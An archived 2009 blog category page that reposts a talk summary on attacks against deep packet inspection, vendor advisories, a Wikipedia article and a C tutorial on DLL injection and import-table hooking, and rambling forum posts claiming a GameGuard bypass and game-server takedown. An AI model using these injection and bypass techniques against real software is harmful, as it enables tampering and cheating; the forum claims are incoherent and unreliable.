'Hacking'에 해당되는 글 266건

  1. 2009.03.10 Staring Into The Abyss, A Bit Before Cansec by CEOinIRVINE
  2. 2009.03.07 Apple Airport Extreme / Time Capsule Multiple Vulnerabilities by CEOinIRVINE
  3. 2009.03.04 DLL injection Wiki by CEOinIRVINE
  4. 2009.03.04 DLL Injection by CEOinIRVINE
  5. 2009.02.11 MS IE Internet Explorer Two Code Execution Vulnerabilities by CEOinIRVINE
  6. 2009.02.10 Technical Server Problem in Soldier Front By Mitch1490 by CEOinIRVINE
  7. 2009.02.10 SF Hacking (Purple Folder) by CEOinIRVINE 1
  8. 2009.02.08 How to be penetration tester? (Computer Security Specialist?) by CEOinIRVINE
  9. 2009.02.06 XSS Cheat Sheet by CEOinIRVINE
  10. 2009.02.06 CIS benchmarks by CEOinIRVINE

Staring Into The Abyss, A Bit Before Cansec

Hacking 2009. 3. 10. 09:49

Staring Into The Abyss, A Bit Before Cansec

I’m just going to come out and say it:  I miss packet craft.  Sure, we can always pull out Scapy, and slap amusing packets together, but everything interesting is always at the other layers.

Or is it?

For CanSecWest this year, I thought it’d be interesting to take a look at the realm of Deep  Packet Inspectors. It turns out we were doing a lot of this around 2000 through 2002, and then…well, sort of stopped.  So, in this year’s CanSecWest paper, “Staring Into The Abyss:  Revisiting Browser v. Middleware Attacks In The Era Of Deep Packet Inspection” (DOC, PDF), I’m taking another crack at the realm — and I’m seeing really interesting capabilities to fingerprint, bypass, and otherwise manipulate systems that watch from the middle of networks, using protocol emulation abilities that have been part of browsers and their plugin ecosystem from the very beginning.

Ah, but here’s where I need some help.  I’ve worked pretty closely with Robert Auger from Paypal, who just published his own paper, “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”.  We independently discovered the HTTP component of this attack pattern, and as I describe in my paper, we’ve kind of forgotten just how much can be done against Active FTP Application Layer Gateways.

So, if I may ask, take a look, check out my paper, and if you have some thoughts, corrections, or interesting techniques, let me know so I can integrate them into my CanSecWest presentation.  Here’s the full summary, to whet your appetite:

DPI — Deep Packet Inspection — technology is driving large amounts of intelligence into the infrastructure, parsing more and more context from data flows going past. Though this work may be necessary to support important business and even security requirements, we know from the history of security that to parse data is to potentially be vulnerable to that data – especially when the parser is designed to extract context as quickly as possible. Indeed, companies such as BreakingPoint and Codenomicon have made their names building test tools to expose potential faults with DPI engines. But could anyone actually trigger these vulnerabilities? In this paper, we restart an old line of research from several years ago: The use of in-browser technologies to “tweak” Deep Packet Inspection systems.

Essentially, by controlling both endpoints surrounding a DPI system, possibly using the TCP (and sometimes UDP) socket code that plugins add to browsers, what behavior can we extract? We find three lines of attack worth noting.

First, firewalls and NATs — the most widely deployed packet inspectors on the Internet today — can still be made to open firewall holes to the Internet by having the browser trigger the Application Layer Gateway (ALG) for protocols like Active FTP. We extend older work by integrating mechanisms for acquiring the correct internal IP address of a client, necessary for triggering many inspection engines, we survey other protocols such as SIP and H.323 that have their own inspection engines, and we explore better strategies for triggering these vulnerabilities without socket engines from browser plugins. We also explore a potentially new mechanism, “Window Dribbling”, that allows an HTTP POST from a browser to be converted into a full bidirectional conversation by only allowing a remote sender to “dribble” a fixed number of bytes per segment.

Second, we (along with Robert Auger at Paypal) find that transparent HTTP proxies, such as Squid, will “override” the intended destination of browser sockets, allowing a remote attacker to send and receive data from arbitrary web sites. This allows (at minimum) extensive and expensive click fraud attacks, and may expose internal connectivity as well (HTTP or even TCP).

Third, and most interestingly, we find that active DPI’s — those that actually alter the flow of traffic between a client and a server — all seem to expose subtly different parsers and handlers for the protocols they manipulate. These variations of behavior can be remotely fingerprinted, allowing an attacker to identify DPI platforms so as to correctly target his attacks. This capability, understood particularly in light of Felix Lindner’s recent work on generic attacks against Cisco infrastructure, underscores the need for both DPI vendors to test their platforms extensively, and for IT managers to deploy critical infrastructure patches with at least as much vigor as desktop support receives today.

For remediation purposes, we recommend two lines of defense – one policy, one technical. As a matter of policy, we find the most important recommendation of this paper that industry reconsiders patching policies as they apply to infrastructure, especially as that infrastructure starts inspecting traffic at ever higher speeds in ever deeper ways. We are actively concerned that administrators have internalized the need to patch endpoints, but aren’t closely tracking the equipment that binds endpoints together – despite their ever increasing intelligence. This is as much a recommendation to vendors – to build patches quickly, and to code audit and fuzz with software from companies like Breakingpoint and Codenomicon – as it is a plea to IT departments to deploy the patches that are generated. Also from a policy perspective, while this paper does recognize the need for judicious use of DPI technology, systems that are deployed across organizational boundaries have particular need for correctness. There have been incidents in the past that have led to security vulnerability across entire ISPs.

On the technical front, we defend the existence of socket functionality in the browser, recognizing that constraining all networking to that which existed in 2001 is not leading to more stable or more secure networks. We explore a solution that potentially allow firewalls to integrate socket policies into their ALG’s, encouraging plugin developers to eventually join in with browser manufacturers and build a single, coherent, cross-domain communication standard. We also discuss more advanced transparent proxy caching policies, which will prevent the Same Origin Policy bypasses discussed above. Finally, we remind home router developers that browsers are still able to access their web interfaces from the Internet, and that this exposure can be repaired by tying default password effectiveness to either a button on the device or a power cycle.

The firewall fingerprinter should be online shortly, with source code for you to play with as well.  Thanks!

(Incidentally, yep, Source is this week, and I have something rather different in store for that event.  The times, they are busy.)

'Hacking' 카테고리의 다른 글

Intel CPU Architecture  (0) 2009.03.11
Socket Capable Browser Plugins Result In Transparent Proxy Abuse  (0) 2009.03.10
Apple Airport Extreme / Time Capsule Multiple Vulnerabilities  (0) 2009.03.07
DLL injection Wiki  (0) 2009.03.04
DLL Injection  (0) 2009.03.04
Posted by CEOinIRVINE
l

Apple Airport Extreme / Time Capsule Multiple Vulnerabilities

Hacking 2009. 3. 7. 02:53


TITLE:
Apple Airport Extreme / Time Capsule Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA34105

VERIFY ADVISORY:
http://secunia.com/advisories/34105/

DESCRIPTION:
Some vulnerabilities have been reported in Apple Airport Extreme and
Time Capsule, which can be exploited by malicious people to conduct
spoofing attacks, disclose potentially sensitive information, or to
cause a DoS (Denial of Service).

1) An error exists in the implementation of the Neighbor Discovery
protocol when processing Neighbor Discovery messages.

For more information:
SA32112

2) An unspecified error exists in the handling of PPPoE discovery
packets. which can be exploited to cause an out-of-bounds memory
access error by sending a specially crafted PPPoE discovery packet.

3) An error exists in the handling of incoming ICMPv6 "Packet Too
Big" messages, which can be exploited to shutdown the device.

This is related to:
SA31745

SOLUTION:
Update to firmware version 7.4.1.

PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.

ORIGINAL ADVISORY:
HT3467:
http://support.apple.com/kb/HT3467

'Hacking' 카테고리의 다른 글

Socket Capable Browser Plugins Result In Transparent Proxy Abuse  (0) 2009.03.10
Staring Into The Abyss, A Bit Before Cansec  (0) 2009.03.10
DLL injection Wiki  (0) 2009.03.04
DLL Injection  (0) 2009.03.04
MS IE Internet Explorer Two Code Execution Vulnerabilities  (0) 2009.02.11
Posted by CEOinIRVINE
l

DLL injection Wiki

Hacking 2009. 3. 4. 05:16

DLL injection

From Wikipedia, the free encyclopedia

Jump to: navigation, search

In computer programming, DLL injection is a technique used to run code within the address space of another process by forcing it to load a dynamic-link library.[1] DLL injection is often used by third-party developers to influence the behavior of a program in a way its authors did not anticipate or intend.[1][2][3] For example, the injected code could trap system function calls,[4][5] or read the contents of password textboxes, which cannot be done the usual way.[6]

 Approaches on Microsoft Windows

There are at least four ways to force a program to load a DLL on Microsoft Windows:

  • DLLs listed under the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs will be loaded into every process that links to User32.dll as that DLL attaches itself to the process.[7][8][9][5]
  • Process manipulation functions such as CreateRemoteThread can be used to inject a DLL into a program after it has started.[10][11][12][13][6][5]
    1. A handle to the target process is obtained, this can be done by spawning the process[14][15] or by keying off something created by that process that is known to exist – for instance, a window with a predictable title,[16] or by obtaining a list of running processes[17] and scanning for the target executable's filename.[18]
    2. Some memory is allocated in the target process,[19] and the name of the DLL to be injected is written to it.[20][10]
      This step can be skipped if a suitable DLL name is already available in the target process. For example, if a process links to ‘User32.dll’, ‘GDI32.dll’, ‘Kernel32.dll’ or any other library whose name ends in ‘32.dll’, it would be possible to load a library named ‘32.dll’. This technique has in the past been demonstrated to be effective against a method of guarding processes against DLL injection.[21]
    3. A new thread is created in the target process,[22] with the thread's start address set to be the address of LoadLibrary and the argument set to the address of the string just uploaded into the target.[23][10]
      Instead of writing the name of a DLL to load to the target and starting the new thread at LoadLibrary, one can of course also write the code to be executed itself to the target and start the thread at that code.[6]
    4. The operating system will now call DllMain in the injected DLL.[24][10]
    Note that without precautions, this approach can be detected by the target process due to the DLL_THREAD_ATTACH notifications sent to every loaded module as a thread starts.[24]
  • Windows hooking calls such as SetWindowsHookEx.[25][26][27][6][2][5]
  • Use the debugging functions to pause all threads, and then hijack an existing thread in the application to execute injected code, that in turn could load a DLL.[28][29][4]

[edit] Approaches on Unix-like systems

On Unix-like operating systems with the dynamic linker based on ld.so (on BSD) and ld-linux.so on (Linux), arbitrary libraries can be linked to a new process by giving the library's pathname in the LD PRELOAD environment variable, that can be set globally or individually for a single process.[30]

For example, this command launches the command "prog --help" with the shared library from file "test.so" linked into it at the launchtime:

LD_PRELOAD="./test.so" prog --help

Such a library can be created with GCC by compiling the source file containing the new globals to be linked, with the -fpic or -fPIC option,[31] and linking with the -shared option.[32] The library has access to external symbols declared in the program like any other library.

'Hacking' 카테고리의 다른 글

Staring Into The Abyss, A Bit Before Cansec  (0) 2009.03.10
Apple Airport Extreme / Time Capsule Multiple Vulnerabilities  (0) 2009.03.07
DLL Injection  (0) 2009.03.04
MS IE Internet Explorer Two Code Execution Vulnerabilities  (0) 2009.02.11
Technical Server Problem in Soldier Front By Mitch1490  (0) 2009.02.10
Posted by CEOinIRVINE
l

DLL Injection

Hacking 2009. 3. 4. 05:09

Introduction

The source files depend a lot on function pointers. Overview is recommended.

DLL Injection is similar to 'Injecting' code into an already running process. Many things have been taken from Matt Pietrek's book 'Secrets of Windows 95'.

Function interception means 'intercepting' an API function that was loaded by a statically linked DLL by modifying the address of the beginning of the function's code, resulting in the application to call your 'intercepting' function instead of the original 'intercepted' function. This is similar to the idea in "APIHijack - A Library for easy DLL function hooking" article posted by Wade Brainerd.

DLL Injection

"DLL Injection" is not an accurate name for what my content will actually be. My code will 'inject' a series of assembled assembly language instructions [Code] into some available space in the running process and alters the registers to point at the offset of the 'injected' [code]. The process will of course execute the instructions which will load a certain DLL, which is the DLL that is being injected. Note that this code 'Injects' [code]. The code can be anything, it doesn't necessarily have to load a DLL. Hence, the inaccurate title.

There are two ways to 'Inject' a series of bytes into an already running process. VirtualAllocEx() - which isn't supported in Win9x/ME - will allow a process to reserve or commit a region of memory within the virtual address space of a separate specified process. Use WriteProcessMemory() to write the data in the reserved/committed area of the target process' memory. The other way is to directly use ReadProcessMemory() and WriteProcessMemory() - which is supported in all versions of Windows - to search for some accessible area of the target process' memory and replace the bytes within the area size equal to the size of the code. Of course, you will be saving a backup of the replaced bytes in order to put them all back later on.

(Of course, you can use CreateRemoteThread() instead of all this, but it's not supported in all versions of Windows.)

One good yet slow method of injecting the code is using Windows' debugging functions. Suspend the threads of the running process (using the debugging functions) and use GetThreadContext() and SetThreadContext() to save a backup of all the registers and then modify the EIP register, which is the register that contains the offset of the current to-be-executed code, to point it to the 'Injected' code. The injected code block will have a breakpoint set at the end of it (Interrupt 3h -int 3h-). Again, use the debugging functions to resume the threads, which will then continue executing till the first breakpoint is reached. Once your application receives the notification, all you have to do is restore the modified bytes and/or un-allocate any allocated space in memory, and finally restore the registers (SetThreadContext()). That's all there is to it. The application has no idea of what has happened! The code was executed, and probably loaded a DLL. As you know, loaded DLLs are in an application's address space, therefore, the DLLs can access all memory and control the whole application. Very interesting.

Lookup the MSDN library for more information (MSDN).

Useful points to lookup:

  1. Memory management...you need to know how Windows manages its memory.
  2. How DLLs tick - MSDN - I suggest you read it. Might help in inspirations. Revising isn't bad.
  3. PE/COFF Headers specifications... The most important thing if you're doing this in Win9x/ME - MSDN.
  4. Basic debugging APIs...those are some APIs that allow you to debug certain applications. Lookup the section "Debugging and Error Handling" in MSDN.
  5. Enough knowledge of ASM is required of course...and OPCODES of instructions.

Have a look at the accompanied files: Injector_src.zip.

---

Google Groups - A Message board thread on CreateRemoteThread()'s method.

Function Interception

Notice the DLL project in the zip file. This function is in HookApi.h.

Collapse Copy Code
// Macro for adding pointers/DWORDs together without C arithmetic interfering 
// -- Taken from Matt Pietrek's book
// Thought it'd be great to use..
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr)+(DWORD)(addValue))
Collapse Copy Code
//This code is very similar to Matt Pietrek's, except that it is written 
//according to my understanding...
//And Matt Pietrek's also handles Win32s 
//--(Because they it has some sort of a problem)
Collapse Copy Code
PROC WINAPI HookImportedFunction(HMODULE hModule,
			         //Module to intercept calls from
     PSTR FunctionModule, //The dll file that contains the function you want to 
			  //hook(ex: "USER32.dll")
     PSTR FunctionName,   //The function that you want to hook 
			  //(ex: "MessageBoxA")
     PROC pfnNewProc)     //New function, this gets called instead
{
    PROC pfnOriginalProc; //The intercepted function's original location
    IMAGE_DOS_HEADER *pDosHeader; 
    IMAGE_NT_HEADERS *pNTHeader;
    IMAGE_IMPORT_DESCRIPTOR *pImportDesc;
    IMAGE_THUNK_DATA *pThunk;
Collapse Copy Code
    // Verify that a valid pfn was passed

    if ( IsBadCodePtr(pfnNewProc) ) return 0; 

    pfnOriginalProc = GetProcAddress(GetModuleHandle(FunctionModule), 
                                                         FunctionName);
    if(!pfnOriginalProc) return 0;
Collapse Copy Code
    pDosHeader = (PIMAGE_DOS_HEADER)hModule; 
    //kindly read the ImgHelp function reference 
    //in the Image Help Library section in MSDN
    //hModule is the Process's Base address  (GetModuleHandle(0)) 
    //even if called in the dll, it still gets the hModule of the calling process
    //---That's you should save the hInstance of the DLL as a global variable, 
    //in DllMain(), because it's the only way to get it(I think)
Collapse Copy Code
    // Tests to make sure we're looking at a module image (the 'MZ' header)
    if ( IsBadReadPtr(pDosHeader, sizeof(IMAGE_DOS_HEADER)) )
        return 0;
    if ( pDosHeader->e_magic != IMAGE_DOS_SIGNATURE ) 
	//Image_DOS_SIGNATURE is a WORD (2bytes, 'M', 'Z' 's values)
        return 0;
Collapse Copy Code
    // The MZ header has a pointer to the PE header
    pNTHeader = MakePtr(PIMAGE_NT_HEADERS, pDosHeader, pDosHeader->e_lfanew); 
    //it's like doing pDosHeader + pDosHeader->e_lfanew
    // e_lfanew contains a RVA to the 'PE\0\0' Header...An rva means, offset,
    // relative to the BaseAddress of module 
    // -pDosHeader is the base address..and e_lfanew is the RVA, 
    // so summing them, will give you the Virtual Address..
Collapse Copy Code
    // More tests to make sure we're looking at a "PE" image
    if ( IsBadReadPtr(pNTHeader, sizeof(IMAGE_NT_HEADERS)) )
        return 0;
    if ( pNTHeader->Signature != IMAGE_NT_SIGNATURE ) 
	//IMAGE_NT_SIGNATURE is a DWORD (4bytes, 'P', 'E', '\0', '\0' 's values)
        return 0;
Collapse Copy Code
    // We now have a valid pointer to the module's PE header. 
    // Now get a pointer to its imports section
    pImportDesc = MakePtr(PIMAGE_IMPORT_DESCRIPTOR, 
      pDosHeader, //IMAGE_IMPORT_DESCRIPTOR *pImportDesc;
      pNTHeader->OptionalHeader.DataDirectory
       [IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

    //What i just did was get the imports section by getting the RVA of it
    //(like i did above), then adding the base addr to it.
    //// pNTHeader->OptionalHeader.DataDirectory
    ///     [IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress
    //// IMAGE_DIRECTORY_ENTRY_IMPORT==1 -- Look at that PE documentation. 
    //// Pietrek's articles in MSJ and MSDN Magazine will be real helpful!
Collapse Copy Code
    //Go out if imports table doesn't exist
    if ( pImportDesc == (PIMAGE_IMPORT_DESCRIPTOR)pNTHeader )
        return 0; //pImportDesc will ==pNTHeader. 
	//if the RVA==0, cause pNTHeader+0==pNTHeader -> stored in pImportDesc
	//Therefore, pImportDesc==pNTHeader
Collapse Copy Code
    // Iterate through the array of imported module descriptors, looking
    // for the module whose name matches the FunctionModule parameter
    while ( pImportDesc->Name ) //Name is a DWORD (RVA, to a DLL name)
    {
        PSTR pszModName = MakePtr(PSTR, pDosHeader, pImportDesc->Name);

        if ( stricmp(pszModName, FunctionModule) == 0 ) 
	    //str"i"cmp,,, suggest you to ignore cases when comparing,
            break; //or strcmpi() in some compilers
Collapse Copy Code
        pImportDesc++;  // Advance to next imported module descriptor
    }
Collapse Copy Code
    // Get out if we didn't find the Dll name. 
    // pImportDesc->Name will be non-zero if we found it.
    if ( pImportDesc->Name == 0 )
        return 0;
Collapse Copy Code
 // Get a pointer to the found module's import address table (IAT)
 //           =====IMAGE_THUNK_DATA *pThunk;
    pThunk = MakePtr(PIMAGE_THUNK_DATA, pDosHeader, pImportDesc->FirstThunk);
 //This is what i was talkin about earlier...
 //In pThunk, if it was image loaded in memory, you'll get the address to 
 //entry point of functions
 //but in a disk file, It's a function name

 // Look through the table of import addresses, of the found 
 // DLL, looking for the function's entry point that matches 
 // the address we got back from GetProcAddress above.
Collapse Copy Code
    while ( pThunk->u1.Function )
    {
       if ( (DWORD)pThunk->u1.Function == (DWORD)pfnOriginalProc )
        {
       // We found it!  Overwrite the original address with the
       // address of the interception function.  Return the original
       // address to the caller so that they can chain on to it.
            pThunk->u1.Function = (PDWORD)pfnNewProc; 
	    // pfnNewProc is in the parameters of the function
	    //pfnOriginalProc = (PROC)(DWORD)pdw1;
            return pfnOriginalProc;
        }

        pThunk++;   // Advance to next imported function address
    }
Collapse Copy Code
    return 0; //function not found!!!!!
}

Also notice:

  • HANDLE OpenLog(char *Filename)
  • BOOL CloseLog(HANDLE h)
  • DWORD AppendLog(char *str, DWORD uSize, HANDLE h)

They are the functions to write to the LOG file. What the whole project does is inject a DLL into an already running process (mIRC.exe - mIRC chatting program (mIRC)) [in my case]. It then creates a Log file of all the intercepted Winsock functions. Have a look at Successlog.txt. It is highly recommended that you apply the program on mIRC only, since it has been created for it. Have fun coding your own :)

I think you got the idea. I hope this is useful.

Regards,

'Hacking' 카테고리의 다른 글

Apple Airport Extreme / Time Capsule Multiple Vulnerabilities  (0) 2009.03.07
DLL injection Wiki  (0) 2009.03.04
MS IE Internet Explorer Two Code Execution Vulnerabilities  (0) 2009.02.11
Technical Server Problem in Soldier Front By Mitch1490  (0) 2009.02.10
SF Hacking (Purple Folder)  (1) 2009.02.10
Posted by CEOinIRVINE
l

MS IE Internet Explorer Two Code Execution Vulnerabilities

Hacking 2009. 2. 11. 07:09


TITLE:
Microsoft Internet Explorer Two Code Execution Vulnerabilities

SECUNIA ADVISORY ID:
SA33845

VERIFY ADVISORY:
http://secunia.com/advisories/33845/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
Microsoft Internet Explorer 7.x
http://secunia.com/advisories/product/12366/

DESCRIPTION:
Two vulnerabilities have been reported in Microsoft Internet
Explorer, which can be exploited by malicious people to compromise a
user's system.

1) An unspecified error exists due to the use of a previously deleted
object. This can be exploited to corrupt memory and execute arbitrary
code when a user e.g. visits a malicious web site.

2) An unspecified error exists within the handling of Cascading Style
Sheets (CSS). This can be exploited to cause a memory corruption and
execute arbitrary code when a user e.g. visits a specially crafted
web site.

SOLUTION:
Apply patches.

Windows XP SP2/SP3:
http://www.microsoft.com/downloads/details.aspx?familyid=8cd902ec-e018-4b61-80f9-825d973f998e

Windows XP Professional x64 Edition (optionally with SP2):
http://www.microsoft.com/downloads/details.aspx?familyid=dd3e2236-9cc0-478e-a46c-981ef685c0e3

Windows Server 2003 SP1/SP2:
http://www.microsoft.com/downloads/details.aspx?familyid=e52aa1fd-e694-4322-b3ff-6abc1b4a16fe

Windows Server 2003 x64 Edition (optionally with SP2):
http://www.microsoft.com/downloads/details.aspx?familyid=edbf1566-b96b-4c7d-98fe-b15f8e766792

Windows Server 2003 with SP1/SP2 for Itanium-based systems:
http://www.microsoft.com/downloads/details.aspx?familyid=5ce78797-d1c0-40d4-84e1-1004389833be

Windows Vista (optionally with SP1):
http://www.microsoft.com/downloads/details.aspx?familyid=5f9fa4b6-85a4-43bc-b84f-6bd847799650

Windows Vista x64 Edition (optionally with SP1):
http://www.microsoft.com/downloads/details.aspx?familyid=e9a8c94b-b9d2-4d64-855f-b5f02ce3dfb5

Windows Server 2008 for 32-bit Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=2491dbf2-7cd3-44f1-bfad-77e6f760a25c

Windows Server 2008 for x64-based Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=794373cc-2dce-4ef5-af50-7804c622c230

Windows Server 2008 for Itanium-based systems:
http://www.microsoft.com/downloads/details.aspx?familyid=11985325-4b33-4077-82cf-6afc7a71c510

PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Zero Day Initiative
2) Sam Thomas via Zero Day Initiative.

ORIGINAL ADVISORY:
MS09-002 (KB961260):
http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx

'Hacking' 카테고리의 다른 글

DLL injection Wiki  (0) 2009.03.04
DLL Injection  (0) 2009.03.04
Technical Server Problem in Soldier Front By Mitch1490  (0) 2009.02.10
SF Hacking (Purple Folder)  (1) 2009.02.10
How to be penetration tester? (Computer Security Specialist?)  (0) 2009.02.08
Posted by CEOinIRVINE
l

Technical Server Problem in Soldier Front By Mitch1490

Hacking 2009. 2. 10. 08:45
Exclamation Technical Server Problem in Soldier Front By Mitch1490
After My Success EMU HUL method Of servering The GAme Soldier Front TO bypass For PRivate Freeself thoughts.

\\ CODERS PLEASE READ TO HAVE THE KNOWLEDGE OF THE GAMES CND AND FOR EXEMPLES I USED
// SOLDIER FRONT

TRUE this SF SErver Downer I PRobably Made IJJI server Down For All Games. Sorry~

LOOK AT THIS AND TELL ME WHO DID:
Purple Folder for GG server by Mitch1490

//-USED TO MAKE BYPASS PURPLEBEAN.EXE OF GAMEGUARD.
//-USED TO MAKE EMULATED SERVERS ABOUT IJJI <--- FROM THE PATH FOUND BY ME.

SERVER SHUT DOWN.
--------------------------
PEace,
Mitch1490 ^_^

I DID FOR WORLD GAME EMULATE IJJI FOR YOU'S.


OR SIMPLY CLICK ON THIS APOLOGIZE IJJI:



NOW THEY ARE IN THIS MOMENT CHANGING THIS:

cdn.ijjimax.com 2571 cdn.ijjimax.com:80 47 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

OH WAIT NOW

cdn.ijjimax.com 53356 cdn.ijjimax.com:80 5221 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

IJJI IS WORKING IN SAME TIME AS ME LOOK

cdn.ijjimax.com 70250 cdn.ijjimax.com:80 51095 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

NOW I GOT 4 BOXES FROM THE CND ENTIERE SERVER INFORMATION STOP TRYING IJJI

cdn.ijjimax.com 74433 cdn.ijjimax.com:80 66292 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

I GUESS THE SERVER IS PLAYING WITH ME IN SOMEHOW TO GENERATE THE OFFSET NUMBERS (VARIABLE)

cdn.ijjimax.com 92111 cdn.ijjimax.com:80 68522 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

OK NOW AFTER PRESSING THE F5 BUTTON TO REFRESH THIS ADDRESS TO SERVER SERVIES
CLICK THIS LINK I'M DONE PLAYING ALONE PLAY UR SELF TO KNOW.

LINK: http://services.ijji.com/service/cdn/traffic

PRESS F5 TO REFRESH.

NOW.

cdn.ijjimax.com 86506 cdn.ijjimax.com:80 102493 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

IF IJJI LOOKING HERE~

I'm Sincerely Sorry for the time lost to you.

IF ( NOT )
{
STD CALL_GivemeJob
}
Return NOT;

DONE NOW LET C THE NUMBERS YOU GOT ^_^

HERE I GOT THIS IN PRESENT

cdn.ijjimax.com 78905 cdn.ijjimax.com:80 128214 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

NOW THAT I'VE WROTED THIS PART OF CODE IT WILL GENERATE NEW ONE TO SERVER MAINTENENTS.

THIS IS WHAT SERVER MAINTENENTS MEAN.

NOW LET's C ...
----------------------------
2 Mins::PAssed
THIS:: cdn.ijjimax.com 96366 cdn.ijjimax.com:80 133516 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0
WAITING::NEW RECT SERVER ADDRESS
WAIT::WAIT
SYSFAILED::FAIL(2mins)

NEW HOOK 4 MINS::PAssed
THIS GENERATED BY SOMEONE WORKING IN SAME TIME AS ME PLAYING AROUND
cdn.ijjimax.com 79954 cdn.ijjimax.com:80 109185 gamedown.ijjimax.com 0 gamedownload.ijjimax.com 0

TRY IT I PLAYED 1 HOUR !!!!~

#FOR REAL

{
NOW
}

RETURN INFINITLY;
_____________________
Peace,
Mitch1490 ^_^ Gooogle'it.

NOW FOR ALL THE SYSTEM RESTRICTION DU TO UR COMPUTER ADMINISTRATION.

This TOOL :: RRT
Attached Files
File Type: zip ijjigamepluginremovetool.exe.zip (83.1 KB, 22 views)
File Type: zip SERVER CHANGES.zip (332.7 KB, 17 views)
File Type: zip SERVER CHANGES 2.zip (401.1 KB, 16 views)
File Type: zip RRT.zip (42.3 KB, 21 views)
Last edited by Carbone14; 01-21-2009 at 04:02 PM. Reason: SERVER PATH CHANGES

'Hacking' 카테고리의 다른 글

DLL Injection  (0) 2009.03.04
MS IE Internet Explorer Two Code Execution Vulnerabilities  (0) 2009.02.11
SF Hacking (Purple Folder)  (1) 2009.02.10
How to be penetration tester? (Computer Security Specialist?)  (0) 2009.02.08
XSS Cheat Sheet  (0) 2009.02.06
Posted by CEOinIRVINE
l

SF Hacking (Purple Folder)

Hacking 2009. 2. 10. 08:35
Post Purple Folder for GG server by Mitch1490
Hi to everyone,

After cleaning my pc From stupid System poop files of the Restriction of whatever...

I HAve Found The Server Emulated By IJJI to The Game.

The PurpleBean.exe is Checking This:

BE AWARE THIS IS THE ENTIERE GAME OF IJJI SERVER SF ( MAP, LOBBY, SOUNDs, ITEMs, ETCs.)

#PrePatch info.( FOR REAL SOLDIER FRONT)

On XP OR VISTA This is the PAth To it "C:\Documents and Settings\me\Application Data\ijjigame".

WARNING: I said REad.
----------------------------
Now I said Get up, IJJI's DOWN. LOOK PAGE 2.

Name files:


//SERVER SCAN NPROTECT & INSTALL XFIRE

u_sf.hul
Code:
PRJNAME U_SF_R
PUBDATE 081015-011258
TCHKSUM 2027549859
TFILENO 187
TZIPSIZE 389047119
DAYLIGHTSAVING 1
 
 
/
ijjiuninstall.exe,             28036552, 294912,   141412,   20080508-104503
ijjilauncher_postplugindll_01.dll,3981295,  53248,    24999,    20070718-190530
 
 
/u_sf
sf.ico,                        185810,   2998,     1097,     20081014-220929
hanpollforclient.dll,          13330850, 151552,   79915,    20071114-211302
cname.hdc,                     4290441,  33604,    33735,    20080826-220318
chat.hdc,                      3890504,  30724,    30848,    20080826-220318
soldierfront.exe,              193480878,1536512,  1523155,  20081014-123109
quietusvs.ini,                 7573,     93,       200,      20061220-173820
specialforceus.ini,            44293,    348,      487,      20080518-234418
hyperpeer.dll,                 13226245, 155648,   59507,    20070607-151450
dbghelp.dll,                   73921967, 665600,   315692,   20061207-121608
enet.dll,                      1582724,  32768,    10905,    20061016-201952
gameguard.des,                 34065372, 277185,   273456,   20080806-124813
hanauthforclient.dll,          16209233, 303104,   94287,    20070417-182840
hanreportforclient.dll,        13169883, 155648,   75304,    20070326-103100
iaf.dll,                       19667167, 225280,   106511,   20081007-094626
mss32.dll,                     34333188, 374272,   173123,   20041210-233530
msvcp60.dll,                   37374268, 401462,   116252,   20001121-150236
msvcp71.dll,                   47651898, 499712,   132586,   20060404-193134
msvcp71d.dll,                  79667358, 765952,   180968,   20060317-062802
msvcr71.dll,                   35175063, 348160,   181017,   20060404-192258
msvcr71d.dll,                  56033397, 544768,   230649,   20060317-062830
msvcrtd.dll,                   40344765, 385100,   160306,   19980617-010000
quietus.dll,                   2074272,  40960,    14365,    20050707-204146
 
 
/u_sf/data
default.cfg,                   143779,   1875,     707,      20080321-140010
 
 
/u_sf/data/area
area_015.sff,                  510394094,8427186,  2324971,  20080825-102310
area_014.sff,                  1714681771,24946018, 5590906,  20080624-105707
area_012.sff,                  2992223,  47740,    10766,    20080124-110718
area_010.sff,                  -1238837083,33945548, 13072739, 20071023-113306
area_009.sff,                  346273762,4220751,  895279,   20070409-160000
area_008.sff,                  -1978400990,32344143, 8352438,  20070404-181758
area_007.sff,                  270967417,4447834,  1105094,  20070301-185440
area_006.sff,                  50795408, 864790,   197190,   20070115-150228
area_005.sff,                  1736772,  19096,    9089,     20070103-201452
area_004.sff,                  270967417,4447834,  1105094,  20061205-183236
area_003.sff,                  5996935,  63458,    28901,    20061016-132246
area_002.sff,                  5471943,  59405,    25367,    20060904-165740
area_001.sff,                  1571834858,221534990,98447852, 20060403-163818
area_011.sff,                  377169895,6709437,  1788463,  20071211-152448
 
 
/u_sf/data/clan
clanmark_symbol.dfz,           117087997,898680,   891776,   20081015-011156
clanmark_frame.dfz,            47241435, 351987,   348642,   20081015-011156
clanmark_bg.dfz,               173871500,1282560,  1279451,  20081015-011156
clanmark3.dfz,                 1258836136,9194654,  9034194,  20061117-131306
clanmark2.dfz,                 1101375342,8033663,  7892874,  20061117-131256
clanmark1.dfz,                 1178585289,8611856,  8480590,  20080131-201348
 
 
/u_sf/data/effect
effect_002.sff,                267734830,2097490,  705203,   20080918-111057
effect_001.sff,                317286380,3220158,  1129414,  20060403-163908
 
 
/u_sf/data/force
force_010.sff,                 61497104, 818377,   304140,   20080424-225300
force_009.sff,                 1112537751,11394298, 7024817,  20080331-135242
force_008.sff,                 1435199637,15096954, 8442912,  20080325-135212
